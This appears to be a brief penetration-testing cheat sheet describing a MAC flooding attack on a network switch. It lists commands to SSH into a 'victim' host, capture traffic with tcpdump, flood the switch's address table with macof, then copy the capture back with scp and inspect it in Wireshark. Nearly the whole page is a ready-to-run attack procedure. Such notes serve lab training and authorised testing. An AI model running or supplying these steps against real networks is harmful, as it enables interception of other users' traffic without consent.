MAC Flooding Attack

Last modified: 2022-11-20


It is a technique that compromises the security of network switches.

Attack Flow

  1. Open Two SSH Sessions

    Start the SSH session 1 in terminal 1.

    ssh victim@<target-ip>

    Start the SSH session 2 in terminal 2.

  2. Flood the Switch and Capturing the Traffic

    In the session 1, start tcpdump and keep it running.

    tcpdump -A -i eth1 -w /tmp/tcpdump.pcap

    In the session 2, start flooding the switch (here "eth1" interface).

    macof -i eth1

    After about 30 seconds, stop macof and tcpdump.

  3. Investigate the Captured Traffic

    In your local machine, transfer the dumped file named "/tmp/tcpdump.pcap" from the target machine to your local machine.

    scp victim@<target-ip>:/tmp/tcpdump.pcap .

    Investigate this file using Wireshark

    wireshark ./tcpdump.pcap